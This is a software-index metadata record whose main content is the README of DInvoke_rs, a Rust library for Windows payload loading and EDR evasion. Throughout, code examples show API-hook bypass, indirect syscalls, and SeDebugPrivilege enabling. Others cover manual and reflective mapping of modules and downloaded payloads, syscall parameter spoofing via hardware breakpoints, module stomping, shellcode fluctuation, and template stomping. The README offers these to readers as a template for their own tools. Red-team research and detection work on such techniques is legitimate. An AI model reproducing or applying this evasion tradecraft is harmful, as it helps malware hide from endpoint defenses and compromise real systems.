{"id":13578385,"url":"https://github.com/Kudaes/DInvoke_rs","last_synced_at":"2025-04-05T18:32:32.753Z","repository":{"id":44997570,"uuid":"411287376","full_name":"Kudaes/DInvoke_rs","owner":"Kudaes","description":"Dynamically invoke arbitrary unmanaged code","archived":false,"fork":false,"pushed_at":"2024-11-20T09:29:11.000Z","size":187,"stargazers_count":339,"open_issues_count":0,"forks_count":41,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-03T10:59:21.930Z","etag":null,"topics":["dinvoke","rust","windows"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Kudaes.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":["Kudaes"]}},"created_at":"2021-09-28T13:12:23.000Z","updated_at":"2025-03-31T21:14:16.000Z","dependencies_parsed_at":"2024-04-08T13:41:40.258Z","dependency_job_id":"9cfaf3cb-8271-41c2-b2b2-ff8db37dff49","html_url":"https://github.com/Kudaes/DInvoke_rs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kudaes%2FDInvoke_rs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kudaes%2FDInvoke_rs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kudaes%2FDInvoke_rs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Kudaes%2FDInvoke_rs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Kudaes","download_url":"https://codeload.github.com/Kudaes/DInvoke_rs/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247384148,"owners_count":20930416,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["dinvoke","rust","windows"],"created_at":"2024-08-01T15:01:30.100Z","updated_at":"2025-04-05T18:32:27.744Z","avatar_url":"https://github.com/Kudaes.png","language":"Rust","readme":"# DInvoke_rs\n\nRust port of [Dinvoke](https://github.com/TheWover/DInvoke). DInvoke_rs may be used for many purposes such as PE parsing, dynamic exported functions resolution, dynamically loading PE plugins at runtime, API hooks evasion and more. This project is meant to be used as a template (just add your own Rust code on top of it) or as a nested crate that can be imported on your own project.\n\nFeatures:\n* Dynamically resolve and invoke undocumented Windows APIs from Rust.\n* Primitives allowing for strategic API hook evasion. \n* Indirect syscalls. **x64 only**\n* Manually map PE modules from disk or directly from memory.\n* PE headers parsing.\n* Map PE modules into sections backed by arbitrary modules on disk. **Not Opsec**\n* Module fluctuation to hide mapped PEs (concurrency supported). **Not Opsec**\n* Syscall parameters spoofing through exception filter + hardware breakpoints. **x64 only**\n* Module stomping and shellcode fluctuation.\n* Template stomping.\n\n# Credit\nAll the credits go to the creators of the original C# implementation of this tool:\n* [The Wover](https://twitter.com/TheRealWover)\n* [FuzzySec (b33f)](https://twitter.com/FuzzySec)\n* [cobbr](https://twitter.com/cobbr_io)\n\n# Content\n\n- [Resolve exported function](#Resolving-Exported-APIs)\n- [Dynamically invoke unmanaged code](#Invoking-Unmanaged-Code)\n- [Execute Indirect Syscall](#Executing-indirect-syscall)\n- [Manually map a PE from disk or memory](#Manual-PE-mapping)\n- [Overload memory section](#Overload-memory-section)\n- [Module fluctuation](#Module-fluctuation)\n- [Use hardware breakpoints to spoof syscall parameters](#Syscall-parameters-spoofing)\n- [Module stomping and Shellcode fluctuation](#Module-stomping-and-Shellcode-fluctuation)\n- [Template stomping](#Template-stomping)\n\n# Usage\n\nImport this crate into your project by adding the following line to your `cargo.toml`:\n\n```rust\n[dependencies]\ndinvoke_rs = \"0.1.5\"\n```\n\n# Examples\n## Resolving Exported APIs\n\nThe example below demonstrates how to use DInvoke_rs to dynamically find and call exports of a DLL (ntdll.dll in this case).\n\n1) Get ntdll's base address.\n2) Use get_function_address() to find an export within ntdll.dll by name. This is done by walking and parsing the dll's EAT.\n3) You can also find an export by ordinal by calling get_function_address_by_ordinal(). \n\n```rust\n\nfn main() {\n\n // Dynamically obtain ntdll.dll's base address. \n let ntdll = dinvoke_rs::dinvoke::get_module_base_address(\"ntdll.dll\");\n\n if ntdll != 0 \n {\n println!(\"ntdll.dll base address is 0x{:X}\", ntdll);\n \n // Dynamically obtain the address of a function by name.\n let nt_create_thread = dinvoke_rs::dinvoke::get_function_address(ntdll, \"NtCreateThread\");\n if nt_create_thread != 0\n {\n println!(\"NtCreateThread is at address 0x{:X}\", nt_create_thread);\n }\n\n // Dynamically obtain the address of a function by ordinal.\n let ordinal_8 = dinvoke_rs::dinvoke::get_function_address_by_ordinal(ntdll, 8);\n if ordinal_8 != 0 \n {\n println!(\"The function with ordinal 8 is at addresss 0x{:X}\", ordinal_8);\n }\n } \n}\n\n```\n\n## Invoking Unmanaged Code\nIn the example below, we use DInvoke_rs to dynamically call RtlAdjustPrivilege in order to enable SeDebugPrivilege for the current process token. This kind of execution will bypass any API hooks present in Win32. Also, it won't create any entry on the final PE Import Address Table, making it harder to detect the PE's behaviour without executing it.\n\n```rust\n\nfn main() {\n\n // Dynamically obtain ntdll.dll's base address. \n let ntdll = dinvoke_rs::dinvoke::get_module_base_address(\"ntdll.dll\");\n\n if ntdll != 0 \n {\n unsafe \n {\n let func_ptr: unsafe extern \"system\" fn (u32, u8, u8, *mut u8) -\u003e i32; // Function header available at data::RtlAdjustPrivilege\n let ret: Option\u003ci32\u003e; // RtlAdjustPrivilege returns an NSTATUS value, which in Rust can be represented as an i32\n let privilege: u32 = 20; // This value matches with SeDebugPrivilege\n let enable: u8 = 1; // Enable the privilege\n let current_thread: u8 = 0; // Enable the privilege for the current process, not only for the current thread\n let e = u8::default(); // https://github.com/Kudaes/rust_tips_and_tricks/tree/main#transmute\n let enabled: *mut u8 = std::mem::transmute(\u0026e); \n dinvoke_rs::dinvoke::dynamic_invoke!(ntdll,\"RtlAdjustPrivilege\",func_ptr,ret,privilege,enable,current_thread,enabled); \n\n match ret {\n Some(x) =\u003e \n \tif x == 0 { println!(\"NTSTATUS == Success. Privilege enabled.\"); } \n \telse { println!(\"[x] NTSTATUS == {:X}\", x as u32); },\n None =\u003e panic!(\"[x] Error!\"),\n }\n } \n } \n}\n\n\n```\n\n## Executing indirect syscall\nIn the next example, we use DInvoke_rs to execute the syscall that corresponds to the function NtQueryInformationProcess. Since the macro dinvoke::execute_syscall!() dynamically allocates and executes the shellcode required to perform the desired syscall, all hooks present in ntdll.dll are bypassed. The memory allocated is release once the syscall returns, avoiding the permanent presence of memory pages with execution permission.\n\n```rust\n\nuse std::mem::size_of;\nuse windows::Win32::System::Threading::{GetCurrentProcess, PROCESS_BASIC_INFORMATION};\nuse dinvoke_rs::data::{NtQueryInformationProcess, PVOID};\n\nfn main() {\n\n unsafe \n {\n let function_type:NtQueryInformationProcess;\n let mut ret: Option\u003ci32\u003e = None; //NtQueryInformationProcess returns a NTSTATUS, which is a i32.\n let handle = GetCurrentProcess();\n let p = PROCESS_BASIC_INFORMATION::default();\n let process_information: PVOID = std::mem::transmute(\u0026p); \n let r = u32::default();\n let return_length: *mut u32 = std::mem::transmute(\u0026r);\n dinvoke_rs::dinvoke::execute_syscall!(\n \"NtQueryInformationProcess\",\n function_type,\n ret,\n handle,\n 0,\n process_information,\n size_of::\u003cPROCESS_BASIC_INFORMATION\u003e() as u32,\n return_length\n );\n\n let pbi:*mut PROCESS_BASIC_INFORMATION;\n match ret {\n Some(x) =\u003e \n if x == 0 {\n pbi = std::mem::transmute(process_information);\n let pbi = *pbi;\n println!(\"The Process Environment Block base address is 0x{:X}\", pbi.PebBaseAddress as u64);\n },\n None =\u003e println!(\"[x] Error executing direct syscall for NtQueryInformationProcess.\"),\n } \n\n }\n}\n\n```\n\n## Manual PE mapping\nIn this example, DInvoke_rs is used to manually map a fresh copy of ntdll.dll, without any EDR hooks. Then that fresh ntdll.dll copy can be used to execute any desired function. \n\nThis manual map can also be executed from memory (use manually_map_module() in that case), allowing the perform the classic reflective dll injection.\n\n```rust\n\nuse dinvoke_rs::data::PeMetadata;\n\nfn main() {\n\n unsafe \n {\n\n let ntdll: (PeMetadata, isize) = dinvoke_rs::manualmap::read_and_map_module(\"C:\\\\Windows\\\\System32\\\\ntdll.dll\", true, true).unwrap();\n\n let func_ptr: unsafe extern \"system\" fn (u32, u8, u8, *mut u8) -\u003e i32; // Function header available at data::RtlAdjustPrivilege\n let ret: Option\u003ci32\u003e; // RtlAdjustPrivilege returns an NSTATUS value, which is an i32\n let privilege: u32 = 20; // This value matches with SeDebugPrivilege\n let enable: u8 = 1; // Enable the privilege\n let current_thread: u8 = 0; // Enable the privilege for the current process, not only for the current thread\n let e = u8::default();\n let enabled: *mut u8 = std::mem::transmute(\u0026e); \n dinvoke_rs::dinvoke::dynamic_invoke!(ntdll.1,\"RtlAdjustPrivilege\",func_ptr,ret,privilege,enable,current_thread,enabled);\n\n match ret {\n Some(x) =\u003e \n if x == 0 { println!(\"NTSTATUS == Success. Privilege enabled.\"); } \n else { println!(\"[x] NTSTATUS == {:X}\", x as u32); },\n None =\u003e panic!(\"[x] Error!\"),\n }\n\n }\n}\n\n```\n\n## Overload memory section\nIn the following sample, DInvoke_rs is used to create a file-backed memory section, overloading it afterwards by manually mapping a PE. The memory section will point to a legitimate file located in %WINDIR%\\System32\\ by default, but any other decoy module can be used.\n\nThis overload can also be executed mapping a PE from memory (as it is shown in the following example), allowing to perform the overload without writing the payload to disk.\n\n```rust\n\nuse dinvoke_rs::data::PeMetadata;\n\nfn main() {\n\n unsafe \n {\n\n let payload: Vec\u003cu8\u003e = your_download_function();\n\n // This will map your payload into a legitimate file-backed memory section.\n let overload: (PeMetadata, isize) = dinvoke_rs::overload::overload_module(payload, \"\").unwrap();\n \n // Then any exported function of the mapped PE can be dynamically called.\n // Let's say we want to execute a function with header pub fn random_function(i32, i32) -\u003e i32\n let func_ptr: unsafe extern \"Rust\" fn (i32, i32) -\u003e i32; // Function header\n let ret: Option\u003ci32\u003e; // The value that the called function will return\n let parameter1: i32 = 10;\n let parameter2: i32 = 20;\n dinvoke_rs::dinvoke::dynamic_invoke!(overload.1,\"random_function\",func_ptr,ret,parameter1,parameter2);\n\n match ret {\n Some(x) =\u003e \n println!(\"The function returned the value {}\", x),\n None =\u003e panic!(\"[x] Error!\"),\n }\n\n }\n}\n\n```\n\n## Module fluctuation\nDInvoke_rs allows to hide mapped PEs when they are not being used, making it harder for EDR memory inspection to detect the presence of a suspicious dll in your process. \n\nFor example, lets say we want to map a fresh copy of ntdll.dll in order to evade EDR hooks. Since two ntdll.dll in the same process could be considered a suspicious behaviour, we can map ntdll and hide it whenever we are not using it. This is very similar to the shellcode fluctuation technique, althought in this scenario we can take advantage of the fact that we are mapping a PE into a legitimate file-backed memory section, so we can replace the ntdll's content for the original decoy module's content that the section is pointing to.\n\n```rust\n\nuse dinvoke_rs::dmanager::Manager;\n\nfn main() {\n\n unsafe \n {\n\n // The manager will take care of the hiding/remapping process and it can be used in multi-threading scenarios \n let mut manager = Manager::new();\n\n // This will map ntdll.dll into a memory section pointing to cdp.dll. \n // It will return the payload (ntdll) content, the decoy module (cdp) content and the payload base address.\n let overload: ((Vec\u003cu8\u003e, Vec\u003cu8\u003e), isize) = dinvoke_rs::overload::managed_read_and_overload(\"c:\\\\windows\\\\system32\\\\ntdll.dll\", \"c:\\\\windows\\\\system32\\\\cdp.dll\").unwrap();\n \n // This will allow the manager to start taking care of the module fluctuation process over this mapped PE.\n // Also, it will hide ntdll, replacing its content with the legitimate cdp.dll content.\n let _r = manager.new_module(overload.1 as i64, overload.0.0, overload.0.1);\n\n // Now, if we want to use our fresh ntdll copy, we just need to tell the manager to remap our payload into the memory section.\n let _ = manager.map_module(overload.1 as i64);\n\n // After ntdll has being remapped, we can dynamically call RtlAdjustPrivilege (or any other function) without worrying about EDR hooks.\n let func_ptr: unsafe extern \"system\" fn (u32, u8, u8, *mut u8) -\u003e i32; // Function header available at data::RtlAdjustPrivilege\n let ret: Option\u003ci32\u003e; // RtlAdjustPrivilege returns an NSTATUS value, which is an i32\n let privilege: u32 = 20; // This value matches with SeDebugPrivilege\n let enable: u8 = 1; // Enable the privilege\n let current_thread: u8 = 0; // Enable the privilege for the current process, not only for the current thread\n let e = u8::default();\n let enabled: *mut u8 = std::mem::transmute(\u0026e); \n dinvoke_rs::dinvoke::dynamic_invoke!(overload.1,\"RtlAdjustPrivilege\",func_ptr,ret,privilege,enable,current_thread,enabled);\n\n match ret {\n Some(x) =\u003e \n if x == 0 { println!(\"NTSTATUS == Success. Privilege enabled.\"); } \n else { println!(\"[x] NTSTATUS == {:X}\", x as u32); },\n None =\u003e panic!(\"[x] Error!\"),\n }\n\n // Since we dont want to use our ntdll copy for the moment, we hide it again. It can we remapped at any time.\n let _ = manager.hide_module(overload.1 as i64);\n\n }\n}\n\n```\n\n## Syscall parameters spoofing\nIn order to spoof the first 4 parameters of a syscall, DInvoke_rs has support for hardware breakpoints in combination with exception handlers. This allows to send not malicious parameters to a NT function, and after the EDR has inspected them, they are replaced by the original parameters before the syscall instruction is executed. For further information, check out the repository where the original idea comes from: [TamperingSyscalls](https://github.com/rad9800/TamperingSyscalls).\n\nFor now, this feature is implemented for the functions NtOpenProcess, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory and NtCreateThreadEx. In order to use it, it's just needed to activate the feature, set the exception handler and call the desired function through Dinvoke.\n\n```rust\n\nuse dinvoke_rs::data::{THREAD_ALL_ACCESS, ClientId};\nuse windows::{Win32::Foundation::HANDLE, Wdk::Foundation::OBJECT_ATTRIBUTES};\n\nfn main() {\n unsafe\n {\n // We active the use of hardware breakpoints to spoof syscall parameters\n dinvoke_rs::dinvoke::use_hardware_breakpoints(true);\n // We get the memory address of our function and set it as a VEH\n let handler = dinvoke::breakpoint_handler as usize;\n dinvoke_rs::dinvoke::add_vectored_exception_handler(1, handler);\n\n let h = HANDLE {0: -1};\n let handle: *mut HANDLE = std::mem::transmute(\u0026h);\n let access = THREAD_ALL_ACCESS; \n let a = OBJECT_ATTRIBUTES::default(); // https://github.com/Kudaes/rust_tips_and_tricks/tree/main#transmute\n let attributes: *mut OBJECT_ATTRIBUTES = std::mem::transmute(\u0026a);\n // We set the PID of the remote process \n let remote_pid = 10952isize;\n let c = CLIENT_ID {unique_process: HANDLE {0: remote_pid}, unique_thread: HANDLE::default()};\n let client_id: *mut CLIENT_ID = std::mem::transmute(\u0026c);\n // A call to NtOpenProcess is performed through Dinvoke. The parameters will be\n // automatically spoofed by the function and restored to the original values\n // before executing the syscall.\n let ret = dinvoke::nt_open_process(handle, access, attributes, client_id);\n\n println!(\"NTSTATUS: {:x}\", ret);\n\n dinvoke_rs::dinvoke::use_hardware_breakpoints(false);\n }\n}\n\n```\n\n## Module stomping and Shellcode fluctuation\nDinvoke_rs's overload crate now allows to perform module stomping by calling the `managed_module_stomping()` function. The first parameter of this function is the shellcode's content. The other two parameters modify the behaviour of the function, allowing three different execution paths commented below.\n\nThe best way to use this function in my opinion is by loading a legitimate dll into the process and allow Dinvoke to determine a good spot in that dll to stomp your shellcode to it. This is done by passing the dll's base address as the third parameter of `managed_module_stomping()`. The second argument must be zero. By doing this, Dinvoke will iterate over the dll's Exception data looking for a legitimate function big enough to stomp the shellcode on it.\n\n```rust\nlet payload_content = download_function();\nlet my_dll = dinvoke_rs::dinvoke::load_library_a(\"somedll.dll\");\nlet module = dinvoke_rs::overload::managed_module_stomping(\u0026payload_content, 0, my_dll);\n\nmatch module {\n Ok(x) =\u003e println!(\"The shellcode has been written to 0x{:X}.\", x.1),\n Err(e) =\u003e println!(\"An error has occurred: {}\", e), \n}\n```\n\nYou can also specify the exact location where you want the shellcode to be stomped to by passing the address as the second parameter:\n\n```rust\nlet payload_content = download_function();\nlet my_dll = dinvoke_rs::dinvoke::load_library_a(\"somedll.dll\");\nlet my_big_enough_function = dinvoke_rs::dinvoke::get_function_address(my_dll, \"somefunction\");\nlet module = overload::managed_module_stomping(\u0026payload_content, my_big_enough_function, 0);\n\nmatch module {\n Ok(x) =\u003e println!(\"The shellcode has been written to 0x{:X}.\", x.1),\n Err(e) =\u003e println!(\"An error has occurred: {}\", e), \n}\n```\n\nFinally, you can allow Dinvoke to automatically decide the address where the shellcode will be stomped to. This is done by iterating over the Exception data of all loaded modules until finding a suitable function. This option may bring unexpected behaviours, so I do not really recommend it unless you don't have other option.\n```rust\nlet payload_content = download_function();\nlet module = dinvoke_rs::overload::managed_module_stomping(\u0026payload_content, 0, 0);\n\nmatch module {\n Ok(x) =\u003e println!(\"The shellcode has been written to 0x{:X}.\", x.1),\n Err(e) =\u003e println!(\"An error has occurred: {}\", e), \n}\n```\n\nOnce the shellcode has been stomped, you can use dmanager crate to hide/restomp your shellcode, allowing to perfom shellcode fluctuation:\n\n```rust\nlet payload_content = download_function();\nlet my_dll = dinvoke_rs::dinvoke::load_library_a(\"somedll.dll\");\nlet overload = dinvoke_rs::overload::managed_module_stomping(\u0026payload_content, 0, my_dll).unwrap();\nlet mut manager = dinvoke_rs::dmanager::Manager::new();\nlet _r = manager.new_shellcode(overload.1, payload_content, overload.0).unwrap(); // The manager will take care of the fluctuation process\nlet _r = manager.hide_shellcode(overload.1).unwrap(); // We restore the memory's original content and hide our shellcode\n ... \nlet _r = manager.stomp_shellcode(overload.1).unwrap(); // When we need our shellcode's functionality, we restomp it to the same location so we can execute it\nlet run: unsafe extern \"system\" fn () = std::mem::transmute(overload.1);\nrun();\nlet _r = manager.hide_shellcode(overload.1).unwrap(); // We hide the shellcode again\n```\n\n## Template stomping\nTemplate stomping is a derivative of the module stomping technique tailored specifically for DLLs. Right now this technique only allows to load a DLL into the current process, remote processes are not supported.\n\nThe main objective is to create a template from a DLL by replacing the content of the `.text` section with arbitrary data, allowing to write the template on disk without raising alerts. This template is crafted in a way that it can be loaded into the process by calling `LoadLibrary`. Then, the original `.text` section content can be downloaded directly to the process' memory and stomped on the template's corresponding memory region. This technique can be effectively executed using two main functions: `generate_template` and `template_stomping`.\n\nThe `generate_template` function is designed to create the template from the original DLL by extracting the `.text` section content and replacing it with arbitrary data. This ensures that the template maintains its structure but contains no meaningful executable code, apart from the entry points and TLS callbacks, which are replaced with dummy but functional assembly instructions. The original `.text` section content is saved separately in `payload.bin`, and the final template file is saved in `template.dll`.\n\n```rust\nfn main ()\n{\n let template = dinvoke_rs::overload::generate_template(r\"C:\\Path\\To\\payload.dll\", r\"C:\\Path\\To\\Output\\Directory\\\");\n match template\n {\n Ok(()) =\u003e { println!(\"Template successfully generated.\");}\n Err(x) =\u003e { println!(\"Error ocurred: {x}\");}\n }\n}\n```\n\nThen the template can be saved on disk in the **target system** and can be loaded in the current process by calling `LoadLibrary`. Once the template has been loaded by the SO, the next step involves stomping the original executable content stored in `payload.bin` into the `.text` section of the template. This process is performed by the `template_stomping` function, which stomps the original executable content into the right memory region taking care of all the details involved in the process.\n\n```rust\n\nfn main ()\n{ \n unsafe\n {\n let mut payload = http_download_payload(); // Download payload.bin content directly to memory\n let stomped_dll = dinvoke_rs::overload::template_stomping(r\"C:\\Path\\To\\template.dll\", \u0026mut payload).unwrap();\n println!(\"Stomped DLL base address: 0x{:x}\", stomped_dll.1);\n\n let function_ptr = dinvoke_rs::dinvoke::get_function_address(stomped_dll.1, \"SomeRandomFunction\");\n let function: extern \"system\" fn() = std::mem::transmute(function_ptr);\n function();\n }\n}\n```\n\nThis technique allows to load a DLL into disk backed memory regions without writing the real executable content to the filesystem (removing the need of private memory regions and evading EDR's static/dynamic analysis) and also allows to keep a clean call stack during the execution of the DLL's code, unlike what happens when we load a DLL reflectively.","funding_links":["https://github.com/sponsors/Kudaes"],"categories":["Rust","Projects"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FKudaes%2FDInvoke_rs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FKudaes%2FDInvoke_rs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FKudaes%2FDInvoke_rs/lists"}